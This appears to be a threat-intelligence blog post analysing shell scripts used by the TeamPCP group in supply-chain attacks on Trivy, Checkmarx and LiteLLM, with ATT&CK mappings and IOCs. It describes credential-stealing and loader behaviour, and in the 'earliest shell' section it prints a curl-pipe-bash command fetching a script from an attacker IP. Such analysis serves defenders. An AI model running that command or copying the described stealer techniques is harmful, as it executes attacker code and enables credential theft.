NOTE: This focuses exclusively on the Shells used by TeamPCP in various campaigns that resulted in the massive Supply Chain Attacks.
INTRODUCTION
In March 2026, multiple GitHub projects were attacked by a Threat Actor Group named “TeamPCP”. Their clear target was Cloud platforms and automated Supply Chain Attacks. The group targets widely used open-source developer tools, CI/CD pipelines, and cloud-native environments, including Docker Hub, PyPI, GitHub Actions, and Kubernetes clusters.
The initial attack, uncovered on March 19, 2026, infected Trivy Scanner (Aqua Security), followed by Checkmarx, LiteLLM, and Telnyx. Over these attacks, a large number of GitHub repositories were compromised using various techniques such as Imposter Commits, Tag Poisoning, Fileless Payload Execution, Wipers, etc.
We will be visiting the shells used in each campaign to draw the analysis.
Before diving deep into the Shell, let’s quickly understand the Supply Chain Attack carried out by TeamPCP in a Nutshell:-
If you are interested to know more about the attacks, there are useful resources published by various vendors like Aikido, SysDig, Wiz, DataDog etc.
SHELLS USED IN TRIVY SUPPLY CHAIN ATTACK
There were 10 Shells used while analyzing the Trivy compromise at different stages. Here are the MD5 Hashes:-
- 4ac3e3b1f0d054a4ed682a1d6a53ddb3
- d761a6a7ae9f2254bd81ac234033a8b8
- 30767275ca828ec1c9d62baccbb0cdf1
- 0a8cf90379e91837f87a8b7cc0d529c2
- c48ead53448a9c62ccd1dd62e2111011
- 4581ab19daebfd2e96962645e798b6fa
- e8ad669f9a29983f7252ebbd40e4c4aa
- ff65f5d264b36a8eb3a6e8037d29fdcb
- 7e521bb895d7329b7fb2b2a8736f4b19
- 2dbedfba5f6bf5f69b471447e4161311
From this, it is evident that the largest file size is 17.18KB and the smallest file size is 179B. The earliest file is mapped on 20th March.
NOTE: The dates are extracted from the VT Records. These files might date back to prior but only seen in the recorded dates on VT Platform.
Let’s dive deep into each Shell and find out their peculiarities.
SHELL 1: trivy_simple.sh (4ac3e3b1f0d054a4ed682a1d6a53ddb3)
Purpose: Credential Harvesting & Remote Exfiltration
Core Behavior: Scans the memory of all running processes by iterating through /proc/$pid/mem. It extracts printable strings and specifically searches (greps) for the literal string “GITHUB_TOKEN”. Matches are dumped into the temporary file /tmp/.s, overwriting its content during each iteration.
Exfiltration: After scanning, it performs a direct HTTP POST of the entire /tmp/.s content to the hardcoded endpoint https://scan.aquasecurtiy.org/upload (a typo-squatted domain of Aqua Security) using Curl.
Purpose: Targeted credential theft, especially GitHub Personal Access Tokens (PATs) commonly used in CI/CD runners. It is the most “noisy” in terms of memory access, but focused on high-value secrets.
Evasion: Relies on in-memory string extraction; no heavy disk writes except the temp file (which is likely cleaned later).
Role in Incident: This shell is the tiniest among 10 which is sized at 179B. As this is laser focused on Credential Harvesting, other capabilities like Persistence are not found. This keeps the script very compact (likely under ~400–500 bytes), making it the lightest and stealthiest of the set for quick execution in CI/CD runners or short-lived containers. This is likely the initial/embedded stealer triggered directly from the compromised Trivy trivy-action or malicious v0.69.4 binary.
Domain Used: scan.aquasecurtiy.org
SHELL 2: 0a8cf90379e91837f87a8b7cc0d529c2 (Kubectl Installer + Python Loader)
Purpose: Prepares a Kubernetes-aware environment and executes a remote Python controller.
Core Behavior: Checks for kubectl library. If missing, detects architecture (amd64/arm64), downloads the official stable kubectl from dl.k8s.io, places it in /tmp, makes it executable, grants execution permission and updates $PATH.
Payload Delivery: Downloads kube.py from a trycloudflare.com tunnel and pipes it directly into python3 for in-memory execution (no disk write for the Python code).
Cleanup: Deletes itself (rm of its own file).
Role in Incident: This script serves as a stage-1/2 loader in the Kubernetes-focused attack chain. Its main job is to prepare the environment for Kubernetes operations and then pull & execute kube.py, which typically handles:
➤Cluster enumeration (pods, secrets, namespaces)
➤Credential harvesting inside the K8s environment
➤Lateral movement and deployment of privileged DaemonSets or additional payloads for persistence and worm-like propagation
It works in tandem with the tiny 179-byte stealer (SHELL 1) that grabs GitHub tokens early, and the other loaders that fetch prop.py or use encoded .wav files.
Domain Used: souls-entire-defined-routes.trycloudflare.com
SHELL 3: c48ead53448a9c62ccd1dd62e2111011 (Kubectl Installer + Kube Loader)
Similar to the above Shell.
Core Behavior: Checks for kubectl; if missing, downloads official kubectl for the detected architecture to /tmp, makes it executable, updates PATH, then executes remote kube.py via curl | python3.
Payload Delivery: Downloads kube.py from a trycloudflare.com tunnel using curl and pipes it directly into python3 for in-memory execution.
Cleanup: Deletes its own script file after payload execution.
Evasion: Uses legitimate tools (curl, python3, official kubectl) and in-memory execution with self-deletion to minimize disk footprint.
Domain Used: investigation-launches-hearings-copying.trycloudflare.com
SHELL 4: 4581ab19daebfd2e96962645e798b6fa (Dual Python Loader)
Same kubectl installation routine as above.
Payload Delivery: Downloads and in-memory executes two Python scripts: kube.py and prop.py from Cloudflare tunnel URLs.
Cleanup: Self-deletes with rm — “$0”.
Domain Used: championships-peoples-point-cassette.trycloudflare.com
SHELL 5: e8ad669f9a29983f7252ebbd40e4c4aa (Minimal Dual Loader)
Core Behaviour: Minimal dual remote loader that directly executes 2 Python scripts from Cloudflare tunnel URLs without kubectl installation logic.
Payload Delivery: Uses curl to download and pipe two remote Python files into python3 for in-memory execution.
Cleanup: Deletes its own script file using rm — “$0” after payload execution.
Evasion: Relies on in-memory execution with legitimate tools and immediate self-deletion to reduce forensic footprint.
Role in Incident: Serves as a lightweight stage-1 loader to deploy kube.py and prop.py backdoor components for Kubernetes access and propagation in the TeamPCP CanisterWorm campaign.
Domain Used: championships-peoples-point-cassette.trycloudflare.com
SHELL 6: ff65f5d264b36a8eb3a6e8037d29fdcb (Single Python Loader)
Core Behaviour: Lightweight single-payload downloader with strict shell options that fetches and executes one remote Python script.
Payload Delivery: Downloads kube.py from a remote URL using curl and pipes it directly into python3 for in-memory execution.
Cleanup: Deletes its own bash script file ($0) from the filesystem after successful payload execution.
Evasion: Minimalist design with in-memory execution, strict shell flags, and self-deletion for low visibility.
Role in Incident: Acts as a simple stage-1 loader to pull and run kube.py for initial Kubernetes backdoor deployment in the TeamPCP CanisterWorm campaign.
Domain Used: championships-peoples-point-cassette.trycloudflare.com
SHELL 7: 7e521bb895d7329b7fb2b2a8736f4b19 (Encoded Dual Loader with Steganigraphy)
Core Behavior: Same MO as other shells. Also, Kubectl installer with a dual encoded loader that downloads files masquerading as .wav, Base64-decodes them, and executes via python3.
Payload Delivery: The core logic is encapsulated in a function that accepts a URL, downloads content from that URL to a randomly named temporary file in /tmp (with a .wav extension), and executes the content. Downloads /bg_kube.wav and /bg_prop.wav to random /tmp/*.wav files from a Cloudflare tunnel base URL, then Base64-decodes and runs them with python3. The script executes this remote code execution function twice, targeting two specific paths (/bg_kube.wav and /bg_prop.wav) on the defined base URL.
Cleanup: Deletes temporary .wav files and its own script file after execution.
Evasion: Uses .wav file masquerading, Base64 encoding, random temp filenames, and in-memory execution to evade detection.
Role in Incident: Functions as an advanced stage-1 loader that prepares kubectl and deploys obfuscated kube.py + prop.py for Kubernetes backdoor, persistence, and worm propagation in the TeamPCP CanisterWorm campaign.
Domain Used: create-sensitivity-grad-sequence.trycloudflare.com
SHELL 8: 2dbedfba5f6bf5f69b471447e4161311
This shell targets Kubernetes as 2 stager files are pushed (kube and Prop).
Similar functionality is observed for Shell 4 (MD5: 4581ab19daebfd2e96962645e798b6fa). Hence, not repeating the same MO.
Domain Used: create-sensitivity-grad-sequence.trycloudflare.com
SHELL 9: d761a6a7ae9f2254bd81ac234033a8b8 (Multi-Stage Credential Stealer)
This is a sophisticated, stealthy credential stealer designed specifically for GitHub Actions runners. This is the malicious entrypoint.sh injected into Aqua Security’s aquasecurity/trivy-action (and similarly into setup-trivy). The first half of the code is malicious and the rest is the legitimate code of Trivy Scanner.
Core Behaviour: The script runs automatically when any workflow calls the poisoned Trivy Action (eg. uses: aquasecurity/trivy-action@0.24.0 or any of the ~76 force-pushed tags).
Process & Environment Discovery:
➤Identifies GitHub Actions runner processes (Runner.Worker, Runner.Listener, run.sh, etc).
➤Dumps environment variables from /proc/<PID>/environ.
➤On GitHub-hosted runners: Uses /proc/<PID>/maps and /proc/<PID>/mem (often with password-less sudo) to parse the .NET process memory heap for masked secrets stored as JSON. This captures secrets referenced in the workflow (${{ secrets.* }}), including the always-present GITHUB_TOKEN.
Filesystem Credential Harvesting:
➤Executes a base64-encoded Python “TeamPCP Cloud Stealer” (embedded or fetched).
➤Dozens of common paths for sensitive files:
SSH keys (~/.ssh/id_*, known_hosts)
➤Cloud provider credentials (AWS ~/.aws/, GCP, Azure)
➤Kubernetes configs and service account tokens (~/.kube/config, /var/run/secrets/kubernetes.io/…)
➤Docker configs, .env files, Terraform/Ansible state, database creds, shell history, crypto wallets, etc.
Focuses on CI/CD-specific secrets that would enable further supply-chain attacks.
Data Packaging & Encryption:
➤Collects everything into a bundle (often tpcp.tar.gz).
➤Encrypts using AES-256-CBC (with PBKDF2 derived key) + RSA-4096 public key wrapping for secure exfiltration.
Exfiltration
➤Primary channel: HTTPS POST to the typo-squatted domain scan.aquasecurtiy.org (resolves to IP 45.148.10.212) with custom header X-Filename: tpcp.tar.gz.
➤Fallback mechanism: If the primary C2 fails and INPUT_GITHUB_PAT (or similar GitHub token) is available, it creates a new public GitHub repository named tpcp-docs under the victim’s own GitHub account and uploads the encrypted bundle as a release asset. The attacker can then download it later without a direct network callback from the runner.
Cleanup: Deletes temporary files and artifacts to reduce forensic footprint.
This is a three-stage credential stealer (process/memory harvest, filesystem sweep, encrypt+exfil) that blends perfectly with normal CI/CD activity.
Domain Used: scan.aquasecurtiy.org
SHELL 10: 30767275ca828ec1c9d62baccbb0cdf1 (Backdoor)
This shell is also named “trivy_malicious_entrypoint.sh”.
Credential Harvesting
➤Scans every process’s memory (/proc/*/mem) with strings for GitHub tokens (GITHUB_TOKEN, ghp_, ghs_), npm tokens, AWS keys, etc.
➤Dumps the entire environment looking for TOKEN|SECRET|KEY|PASSWORD|CREDENTIAL|AWS_|NPM_|GH_.
➤Steals ~/.ssh/id_rsa, ~/.aws/credentials, ~/.npmrc.
Encrypts everything
➤Writes a hardcoded attacker RSA public key to /tmp/.k.
➤Uses openssl rsautl -encrypt on the collected secrets (/tmp/.s → /tmp/.e).
Exfiltration
Primary C2 is set up as the typo-squatted domain. As a Fallback, the group added CloudFlare Tunnel. Uses the stolen GITHUB_TOKEN to create a public repo named “tpcp-docs” as Github Fallback.
The stolen data is compressed and encrypted into a file named tpcp.tar.gz
Clean Up: Self deletes it as before.
Domain Used:
scan.aquasecurtiy.org
plug-tab-protective-relay.trycloudflare.com
Among these 10 shells, a common TTP is found which is the following:-
- T1064 : SCRIPTING
- T1543 : CREATE/MODIFY SYSTEM PROCESS
- T1070 : INDICATOR REMOVAL
- T1222 : FILE & DIRECTORY PERMISSIONS
- T1564 : HIDE ARTIFACTS
- T1082 : SYSTEM INFORMATION DISCOVERY
- T1083 : FILE & DIRECTORY DISCOVERY
- T1048 : EXFILTRATION OVER ALTERNATIVE PROTOCOL
- T1518 : SOFTWARE DISCOVERY
- T1071 : APPLICATION LAYER PROTOCOL
- T1573 : ENCRYPTED CHANNEL
- T1195 : SUPPLY CHAIN ATTACK
SHELLS USED IN CHECKMARX KICS & LITELLM
During analysis, it is found that the shells used in Checkmarx are also utilized in LiteLLM Compromise.
Both are found to be used on 25th March 2026. Both files are named as scan.sh and detect.sh.
- b72c2be9651ede5f337926c6b5830624
- 98021dca558b69e93a20d912200f1782
SHELL 1: b72c2be9651ede5f337926c6b5830624 (scan.sh)
This is part of a supply chain attack on the popular open-source LiteLLM Python package (used as an AI/LLM gateway/unified interface for calling models from OpenAI, Anthropic, etc.). Attackers pushed malicious versions (1.82.7 and 1.82.8) to PyPI.
Core Behaviour: Credential Stealer and Data Exfiltration spotted.
Payload Delivery: The malware was delivered via a file like litellm_init.pth (Python automatically executes .pth files on interpreter startup, even if you don’t directly import LiteLLM). This made it persistent and stealthy across many Python environments.
Activities: Credential Harvesting: Scans for and collects sensitive data including:
AWS, GCP, Azure, and other cloud credentials/tokens
SSH/private keys
Kubernetes secrets/configs
Crypto wallet keys
.env files, passwords, and CI/CD-related secrets
Bundles everything into an archive (often named something like tpcp.tar.gz).
Encryption: Uses a hybrid scheme — typically AES-256 (with OpenSSL) combined with RSA-4096 (public key encryption) or similar.
Exfiltration: Sends the encrypted data via HTTP POST to the attacker-controlled domain models.litellm.cloud (a lookalike of the legitimate LiteLLM project to blend in). Additional capabilities like lateral movement in Kubernetes (e.g., deploying privileged pods), and may install a persistent systemd backdoor that polls for further payloads.
Role in Incident: Credential stealer and data exfiltrator by harvesting cloud/SSH/K8s/crypto secrets, encrypting them with AES+RSA, and POSTed the archive to attacker-controlled models.litellm.cloud.
This matches the sample’s behavior in the LiteLLM PyPI supply-chain attack (malicious versions 1.82.7/1.82.8 via litellm_init.pth or embedded in proxy_server.py). It ran automatically on Python startup for stealth.
SHELL 2: 98021dca558b69e93a20d912200f1782 (detect.sh)
This is a detector shell used to check for compromised LiteLLM Packages or any IOCs for vulnerable versions.
The script performs the following systematic checks:
➤Package Version Verification: It queries pip and pip3 to determine the installed version of litellm, flagging specific versions (“1.82.7” or “1.82.8”) as compromised.
➤File System Scanning: It identifies Python site-package directories (system, user, and virtual environments) and common cache locations. It then recursively searches these paths for the presence of the file litellm_init.pth.
➤Persistence Artifacts: It checks for the existence of specific files and directories associated with a persistent backdoor, including configuration paths under $HOME/.config/sysmon/ and files in /tmp/. It also verifies if a user service named sysmon.service is active using systemctl.
➤Network Analysis: It examines active network connections using lsof or ss, searching for connections to two hardcoded malicious domain patterns (litellm.cloud or checkmarx.zone).
➤Kubernetes Environment Inspection: If kubectl is available, it queries the kube-system namespace to look for suspicious pod names matching “node-setup-” and attempts to identify any containers running with a privileged security context.
➤Reporting: The script compiles all findings and exits with a non-zero status code if any IoCs are detected.
The script is non-destructive and operates strictly as a forensic detection mechanism.
In this campaign, TeamPCP had invested more techniques which resulted in the increased size of Shells, which also contributes to more TTPs.
- T1053 : SCHEDULED JOB
- T1059 : COMMAND AND SCRIPTING INTERPRETER
- T1064 : SCRIPTING
- T1543 : CREATE/MODIFY SYSTEM PROCESS
- T1070 : INDICATOR REMOVAL
- T1564 : HIDE ARTIFACTS
- T1003 : OS CREDENTIAL DUMPING
- T1016 : SYSTEM NETWORK CONFIGURATION DISCOVERY
- T1082 : SYSTEM INFORMATION DISCOVERY
- T1083 : FILE & DIRECTORY DISCOVERY
- T1518 : SOFTWARE DISCOVERY
- T1005 : DATA FROM LOCAL SYSTEM
- T1071 : APPLICATION LAYER PROTOCOL
- T1573 : ENCRYPTED CHANNEL
- T1195 : SUPPLY CHAIN ATTACK
In case of Telnyx, there were no Shells found (as of now).
FINDING EARLIEST SHELL
While mapping the timeline of TeamPCP Shells, it is found that the earliest shell is traced to 14th December 2025, hence confirming that the group ramped up from December 2025 to get a successful attack in March 2026.
The MD5 is: 692238a56e1941b1d92df3d8dfd513eb
Purpose: Core propagation and infrastructure builder. Turns any compromised cloud host into a scanning + proxy node for the botnet.
Delivery: Typically fetched via curl -fsSL http://67.217.57.240:666/files/proxy.sh | bash
Environment Fingerprinting: Immediately checks if running inside Kubernetes; if yes, it branches into K8s-specific logic (drops itself into pods, deploys privileged DaemonSet, etc.).
Post-exploitation actions:
➤Installs tunneling/proxy tools (gost for SOCKS5, frps/frpc, etc.).
➤Deploys additional scanners (pcpcat.py, react.py).
➤Sets up persistence (systemd service named teampcp-react.service or similar).
➤Downloads and executes BORING_SYSTEM binary for further C2.
➤Scans local subnet + broad internet ranges for more vulnerable services and auto-infects them (self-propagating worm behavior).
Stealth: Runs entirely in-memory where possible; avoids leaving obvious files when feasible; masquerades as legitimate scanning activity.
TEAMPCP MODUS OPERANDI
Most notable MO uncovered while analyzing the Supply Chain Attacks. Here are some. This would help you to keep an eye on your network to thwart any hijack attempts.
➤Self-Propagating npm Worm spreading Backdoors like CanisterWorm used by TeamPCP
➤Credential Harvesting from CI/CD and Developer Environments targeting Cloud, Crypto, Git, Slack, and Discord Keys
➤The stolen data is compressed into a file named tpcp.tar.gz
➤Exfiltrated Data is encrypted using AES-256-CBC and RSA-4096
➤Uses Brute-Force attacks to gain access to weak credentials
➤TruffleHog tool usage to validate stolen credentials in Post Compromise stage
➤Using AdaptixC2 to deploy a beacon for remote shell, process management, and screenshot capture after compromising software packages.
➤Havoc C2 for post-exploitation tasks like pivoting through compromised hosts into internal networks, privilege escalation, and maintaining stealth
➤pgmon is a persistent Python-based backdoor, designed to evade detection by masquerading as a legitimate PostgreSQL monitoring service on Linux systems
➤Malware packed inside a WAV using Steganography achieving decent stealthiness
➤The attacks consistently use openssl enc -aes-256-cbc -pbkdf2 for data encryption
➤TeamPCP had made use of Multiverze — A Linux Trojan which is an automated threat that affects Linux servers running accessible SSH services as its main attack vector for Shells
➤Tag Poisoning used by TeamPCP redirecting to malicious packages using Fake Commits
➤Reuse of Shells observed
➤Constant scanning on /proc/*/mem from “Runner.Worker” processes to extract secrets stored in memory
➤Heavy focus on kubectl + K8s lateral movement via privileged pod deployment is a hallmark of TeamPCP campaigns.
➤Use of /tmp for staging, direct python3 execution of remote scripts, and self-deletion (rm “$0”)
➤Trojanizing extensions like OpenVSX
➤C2 Channels used by TeamPCP:-
— Typo-Squatted Domains
— Internet Computer Protocol (ICP) blockchain
— Cloudflare Tunnels
— GitHub Dead-Drops
NOTE: Simply blocking the artifacts found in the IOC section would not help you to defend against any attacks as they are easily replaceable. Hence, these MO would help you to draw the attacker’s actions
IOCs
DOMAINS=======aquasecurtiy.orgcheckmarx.zonemodels.litellm.cloudchampionships-peoples-point-cassette.trycloudflare.cominvestigation-launches-hearings-copying.trycloudflare.comsouls-entire-defined-routes.trycloudflare.comcreate-sensitivity-grad-sequence.trycloudflare.complug-tab-protective-relay.trycloudflare.comtdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.ioffxjhdp4aaucgrkh5jy5xb4f4lhwre7wqxteg27i24pfyb2uwlwxgoyd.onionMD5===4ac3e3b1f0d054a4ed682a1d6a53ddb3d761a6a7ae9f2254bd81ac234033a8b830767275ca828ec1c9d62baccbb0cdf10a8cf90379e91837f87a8b7cc0d529c2c48ead53448a9c62ccd1dd62e21110114581ab19daebfd2e96962645e798b6fae8ad669f9a29983f7252ebbd40e4c4aaff65f5d264b36a8eb3a6e8037d29fdcb7e521bb895d7329b7fb2b2a8736f4b192dbedfba5f6bf5f69b471447e4161311b676c0703f8e4d6a198aa370ca4f5405b72c2be9651ede5f337926c6b583062498021dca558b69e93a20d912200f1782ab3441f16434b948a1bc653c2822e114a0d6118b15ff55fd2dc63b72fbc54108af915698efd4542a58fe0b293f4a9e40ccd59fd564a4780c3186ef43d0d027233f88eca0a421a81595ee5669e6fd081618af2b181388d1e142d5cb45300aff49ecce2568792b0fd029a8f3b056468125af6b28b9565fe1022ab904151393fd62e4f074172ffde75287346d207debee39692238a56e1941b1d92df3d8dfd513ebIP==45.148.10.21283.142.209.1183.142.209.20346.151.182.20367.217.57.240 169.254.170.244.252.85.168http://67.217.57.240:666/files/pcpcat.pyPGP Key of TeamPCP-----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0EmNg7m3J6C3KzFeIzvz0UTgSq6cVpQWpiuQa+UjTkWmC8RDDXO8G/opLGQnuQVvgsZWuT31j/Qop6rtocYsayGzCFrMV2/ElW1UE20tZWY+5jXonnMdWBmYwzYb5iwymbLtekGEydyLalNzGAPxZgAxgkbSEmSHLau61fChgT9MlnPhCtdXkQRMrI3kZZ4MDPuEEJTSqLr+D3ngr3237G14SRRQBIqIjly5OoFkqJxeNPSGJlt3Ino0qO7fy7LO0Tp9bFvXTOI5c+1lhgo0lScAu1ucAb6Hua+xRQ6s//PzdMgWT3R1aK+TqMHJZTZa8HY0KaiFeVQ3YitWuiZ3ilwCtwhT5TlS9cBYph8U2Ek4K20qmp1dbFmxm3kS1yQg8MmrBRxOYyjSTQtveSeIlxrbpJhaUZ7eneYC4G/Wl3raZfFwoHtmpFXDxA7HaBUArznP55LD/rZd6gq7lTDrSy5uMXbVt6ZnKd0IwHbLkYlX0oLeCNF6YOGhgyX9JsgrBxT0eHeGRqOzEZ7rCfCavDISbR5xKJ4VRwlUSVsQ8UXt6zIHqg4CKbrVB+WMsRo/FWu6RtcQHdmGPngy+Nvg5USAVljykrn3JMF0xZyXNRpQ/fZZxl40CAwEAAQ==-----END PUBLIC KEY-----
Leave a Reply